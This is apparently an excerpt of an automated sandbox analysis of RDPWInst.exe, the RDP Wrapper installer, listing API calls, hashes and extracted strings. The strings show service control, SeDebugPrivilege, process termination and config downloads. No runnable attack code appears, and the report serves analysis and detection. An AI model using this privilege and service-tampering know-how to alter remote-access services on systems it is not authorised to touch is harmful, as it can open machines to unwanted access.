                                                                                • Opcode ID: 7e0a8c61708f8e5fe9311120f60f8f5fdb241708797c452f410103c20568c8cd
                                                                                • Instruction ID: 9da8dff9c55e20549594a614ff7d844013acaeb15ab394cddf5a90cc700bc9e0
                                                                                • Opcode Fuzzy Hash: 7e0a8c61708f8e5fe9311120f60f8f5fdb241708797c452f410103c20568c8cd
                                                                                • Instruction Fuzzy Hash: 69E0927170021817E314A5695C86DEB725C9B58300F00417FBA06D7387EDB89D6046ED
                                                                                APIs
                                                                                • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: ab3a7bc9c987a33d67a9bd60b42fd60c334eb7a711f5428dc5487131ec69b403
                                                                                • Instruction ID: 70141b24f99fd98ac1db3019ee377dee0462c825b9fd2fb3f3473e8324f2be5c
                                                                                • Opcode Fuzzy Hash: ab3a7bc9c987a33d67a9bd60b42fd60c334eb7a711f5428dc5487131ec69b403
                                                                                • Instruction Fuzzy Hash: 01E0DF3270031827F31495689D86EFB729C9B58300F00427BBE06D3382FDB49DA046E9
                                                                                APIs
                                                                                • GetLocaleInfoW.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0041524C,00000000,00415476,?,?,00000000,00000000), ref: 00412CAB
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: c8c474e4d6c9df360d6374c6a6ae5d3dec4118d646be2418b28a4789b35754d1
                                                                                • Instruction ID: c0299d43d85d1b47cbbe3802d462e1d0899c6c80b318dcec9f9e75b03fa43e2d
                                                                                • Opcode Fuzzy Hash: c8c474e4d6c9df360d6374c6a6ae5d3dec4118d646be2418b28a4789b35754d1
                                                                                • Instruction Fuzzy Hash: 17D05EB63092202AE210525B6E45DBF56DCCBC87A2F10443BBA48C6242E268CC5693F9
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocalTime
                                                                                • String ID:
                                                                                • API String ID: 481472006-0
                                                                                • Opcode ID: e8d3b386f6a7d5cca3471eaf155d8864694d2401fe0684cb90b003475a380097
                                                                                • Instruction ID: 9e8cd4c1e66a35051b5eb1694121f13696e39ccab0ec977751e8beb904ec194d
                                                                                • Opcode Fuzzy Hash: e8d3b386f6a7d5cca3471eaf155d8864694d2401fe0684cb90b003475a380097
                                                                                • Instruction Fuzzy Hash: D1A0110080882002C2803B2A0C032383080A800A30FC80BAAB8F8A02E2EA2E023088AB
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 00417D39
                                                                                  • Part of subcall function 00417D04: GetProcAddress.KERNEL32(00000000), ref: 00417D1D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                • API String ID: 1646373207-1918263038
                                                                                • Opcode ID: 81f6385aaf31a6d67a1cea20af38a948cd8301cfd12a13a567f36fd7be5fd1ef
                                                                                • Instruction ID: c99ab9519c0edb256345e3c1c1fceae5193512a11a1c4a98270a3cb03c9355dc
                                                                                • Opcode Fuzzy Hash: 81f6385aaf31a6d67a1cea20af38a948cd8301cfd12a13a567f36fd7be5fd1ef
                                                                                • Instruction Fuzzy Hash: 25412575A4C2085A5305AB6EB8018FA77B9DA86324374D07FF5088B745DF7CACC2876D
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AE85
                                                                                • GetLastError.KERNEL32(00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AE90
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000001,00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AED6
                                                                                • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000001,00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AEE2
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,00000001,00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AEE7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastOpenService$CloseHandleManager
                                                                                • String ID: $sD$...$ServicesActive$[*] Checking $[-] OpenSCManager error (code $[-] OpenService error (code $[-] QueryServiceConfig error (code $[-] QueryServiceConfig failed.
                                                                                • API String ID: 48634454-3812534468
                                                                                • Opcode ID: 091b0035d6a152c75cbcb3aeab795098a1a073895450a053807206380d0ec52c
                                                                                • Instruction ID: 7a774fc46d996de6837286bf894840c9c95f128f26b1d3a09438fbe6509dfab0
                                                                                • Opcode Fuzzy Hash: 091b0035d6a152c75cbcb3aeab795098a1a073895450a053807206380d0ec52c
                                                                                • Instruction Fuzzy Hash: 41418FA4A08200AAD711F7B68C42A5F76A99F88308F11917BB514B6293CB3CAD01967F
                                                                                APIs
                                                                                  • Part of subcall function 0043C45C: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
                                                                                  • Part of subcall function 0043B7D4: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,0043BC5D,?,?,?,00447324,00000000,00000000,?,00443F06,00000000,00443FB2), ref: 0043B801
                                                                                  • Part of subcall function 0043B7D4: GetLastError.KERNEL32(00000000,ServicesActive,00000005,00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B80C
                                                                                  • Part of subcall function 0043B7D4: EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B8A2
                                                                                  • Part of subcall function 0043B7D4: GetLastError.KERNEL32(00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8AF
                                                                                  • Part of subcall function 0043B7D4: CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8BF
                                                                                  • Part of subcall function 0043B7D4: CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B99F
                                                                                  • Part of subcall function 0043BF00: GetCurrentProcess.KERNEL32(00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF3D
                                                                                  • Part of subcall function 0043BF00: OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF43
                                                                                  • Part of subcall function 0043BF00: GetLastError.KERNEL32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF4C
                                                                                  • Part of subcall function 0043C1C8: OpenProcess.KERNEL32(00000001,00000000,00000D10,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1CF
                                                                                  • Part of subcall function 0043C1C8: GetLastError.KERNEL32(00000001,00000000,00000D10,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1DA
                                                                                  • Part of subcall function 0043C1C8: TerminateProcess.KERNEL32(00000000,00000000,00000001,00000000,00000D10,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000), ref: 0043C219
                                                                                  • Part of subcall function 0043C1C8: CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000D10,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C223
                                                                                  • Part of subcall function 0043C1C8: GetLastError.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000D10,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C228
                                                                                  • Part of subcall function 0043C1C8: CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000D10,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C265
                                                                                • Sleep.KERNEL32(000003E8,?,?,00000000,0043FAEE,?,?,?,00447324), ref: 0043F9CC
                                                                                • Sleep.KERNEL32(000001F4,000003E8,?,?,00000000,0043FAEE,?,?,?,00447324), ref: 0043FA09
                                                                                  • Part of subcall function 0043B58C: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5EA
                                                                                  • Part of subcall function 0043B58C: GetLastError.KERNEL32(?,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$CloseHandleOpenProcess$ManagerServiceSleep$CurrentEnumEnvironmentExpandServicesStatusStringsTerminateToken
                                                                                • String ID: $sD$%d.%.2d.%.2d$SeDebugPrivilege$TermService$[*] Current update date: $[*] Everything is up to date.$[*] Latest update date: $[*] Terminating service...$[*] Your INI file is newer than public file. Are you a developer? :)$[+] New update is available, updating...$[+] Update completed.$[-] Failed to download latest INI from GitHub.$rdpwrap.ini
                                                                                • API String ID: 3534747103-2332903941
                                                                                • Opcode ID: 5622ae87d0b029e3d159e39c34d23c7b577837b013ae26526cbfe9c4d1771b2e
                                                                                • Instruction ID: 35adde3c6c2359a68fd4b220f91aa0339034fd12c6c7055d874297ef65b27e77
                                                                                • Opcode Fuzzy Hash: 5622ae87d0b029e3d159e39c34d23c7b577837b013ae26526cbfe9c4d1771b2e
                                                                                • Instruction Fuzzy Hash: D5813074E042099BDB04FBA9D48169DB7B1EF8D308F51507AF504F7392DB38AD058B6A
                                                                                APIs
                                                                                  • Part of subcall function 0043C45C: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
                                                                                • DeleteFileW.KERNEL32(00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0,000003E8), ref: 0043D985
                                                                                • GetLastError.KERNEL32(00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0,000003E8), ref: 0043D98E
                                                                                • DeleteFileW.KERNEL32(00000000,00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0), ref: 0043DA04
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0), ref: 0043DA0D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteErrorFileLast$EnvironmentExpandStrings
                                                                                • String ID: $sD$[+] Removed file: $[+] Removed folder: $[-] DeleteFile error (code $[-] RemoveDirectory error (code $rdpwrap.ini
                                                                                • API String ID: 1427661212-4281953003
                                                                                • Opcode ID: 956330302bce8ffae5f1d8e764e19dadb3842e9c2b8f573e08a3f0797d5542d8
                                                                                • Instruction ID: ad05ad182a3b94ca814d20fd028ad2e32e4b81082960bb03fd6afff070a44f54
                                                                                • Opcode Fuzzy Hash: 956330302bce8ffae5f1d8e764e19dadb3842e9c2b8f573e08a3f0797d5542d8
                                                                                • Instruction Fuzzy Hash: 31414F74A042049BDB00F7B6D94286EB375AF8D308F52813BF500B7697DA3CBD059A6E
                                                                                APIs
                                                                                  • Part of subcall function 0041325C: VirtualQuery.KERNEL32(?,?,0000001C,00000000,00413408), ref: 0041328F
                                                                                  • Part of subcall function 0041325C: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 004132B3
                                                                                  • Part of subcall function 0041325C: GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 004132CE
                                                                                  • Part of subcall function 0041325C: LoadStringW.USER32(00000000,0000FFE5,?,00000100), ref: 00413369
                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,00413571), ref: 004134AD
                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004134E0
                                                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004134F2
                                                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004134F8
                                                                                • GetStdHandle.KERNEL32(000000F4,0041358C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0041350C
                                                                                • WriteFile.KERNEL32(00000000,000000F4,0041358C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 00413512
                                                                                • LoadStringW.USER32(00000000,0000FFE6,?,00000040), ref: 00413536
                                                                                • MessageBoxW.USER32(00000000,?,?,00002010), ref: 00413550
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
                                                                                • String ID: $sD$(4A$LpD
                                                                                • API String ID: 135118572-2961882766
                                                                                • Opcode ID: b1b80ecb5956461e4b881ed504ca6201c56dd4012f9b0e7eae4b86507d2a61a1
                                                                                • Instruction ID: ef224b53181cf2408eecbf6e4a49f74db113686e973540ee16aa2e1e81a8a81f
                                                                                • Opcode Fuzzy Hash: b1b80ecb5956461e4b881ed504ca6201c56dd4012f9b0e7eae4b86507d2a61a1
                                                                                • Instruction Fuzzy Hash: E4315E71640204BEE710EBA5DC82FDA73BDEB05B05F50417AB604F61D1DE78AE808B69
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(?), ref: 00409F3F
                                                                                • GetLastError.KERNEL32(?), ref: 00409F4A
                                                                                • RaiseException.KERNEL32(C0FB007E,00000000,00000001,?), ref: 00409F80
                                                                                • EnterCriticalSection.KERNEL32(00449C1C), ref: 00409F92
                                                                                • FreeLibrary.KERNEL32(?,00449C1C), ref: 00409FAA
                                                                                • LeaveCriticalSection.KERNEL32(00449C1C,?,00449C1C), ref: 00409FB7
                                                                                • GetProcAddress.KERNEL32(?,?), ref: 0040A026
                                                                                • GetLastError.KERNEL32 ref: 0040A031
                                                                                • RaiseException.KERNEL32(C0FB007F,00000000,00000001,?), ref: 0040A067
                                                                                  • Part of subcall function 00409D9C: LocalAlloc.KERNEL32(00000040,00000008), ref: 00409DA8
                                                                                  • Part of subcall function 00409D9C: RaiseException.KERNEL32(C0FB0008,00000000,00000001,?,00000040,00000008), ref: 00409DBD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionRaise$CriticalErrorLastLibrarySection$AddressAllocEnterFreeLeaveLoadLocalProc
                                                                                • String ID: $
                                                                                • API String ID: 4255670546-3993045852
                                                                                • Opcode ID: 08a0a7318c753487ffaddfe208f10df44aed4acf1db62cc8abab006cc3ed4991
                                                                                • Instruction ID: e7bef61209e92d946731ec4a4071e7a79c0b4aa0f4738c46576ebf8cfa3b661b
                                                                                • Opcode Fuzzy Hash: 08a0a7318c753487ffaddfe208f10df44aed4acf1db62cc8abab006cc3ed4991
                                                                                • Instruction Fuzzy Hash: EE618D7590070AAFDB21DFA5D885BAFB3B4AF48314F14803AE504B62D2D7789D44CB59
                                                                                APIs
                                                                                • MessageBoxA.USER32(00000000,?,004026E0,00002010), ref: 00403F39
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message
                                                                                • String ID: $$zD$$zD$7$D&@$l&@$zPD$&@
                                                                                • API String ID: 2030045667-2939321579
                                                                                • Opcode ID: fc4d6aa325ebee328d8d0a4eacd8edc52d624fa8d19bb34694b2db134725d9d3
                                                                                • Instruction ID: 997706f527e00cc568bc624ae0a330c29571725258f71f9dd8560831bc4d878f
                                                                                • Opcode Fuzzy Hash: fc4d6aa325ebee328d8d0a4eacd8edc52d624fa8d19bb34694b2db134725d9d3
                                                                                • Instruction Fuzzy Hash: E5B1B434A042548FDB20DF2DC884B997BE8AB09745F1441FAE449F7382CB799E85CB59
                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(00000000,00415476,?,?,00000000,00000000), ref: 004151CE
                                                                                  • Part of subcall function 00412C4C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Locale$InfoThread
                                                                                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                • API String ID: 4232894706-2493093252
                                                                                • Opcode ID: 4a29d05eb48406c99d8d70e3cc1c652b0ba952fed9bde6c231d4620e19fd4c29
                                                                                • Instruction ID: d9a4c13083f090c9220c38b115c8470d0dd0b24888f81dbd48f38483d2476b95
                                                                                • Opcode Fuzzy Hash: 4a29d05eb48406c99d8d70e3cc1c652b0ba952fed9bde6c231d4620e19fd4c29
                                                                                • Instruction Fuzzy Hash: C6717E34B005489BDB04EBA5C881BDF73A6DB88308F50843BB201EB39ADA3DDD95975C
                                                                                APIs
                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004198D5
                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004198F1
                                                                                • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0041992A
                                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004199A7
                                                                                • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004199C0
                                                                                • VariantCopy.OLEAUT32(?), ref: 004199F5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
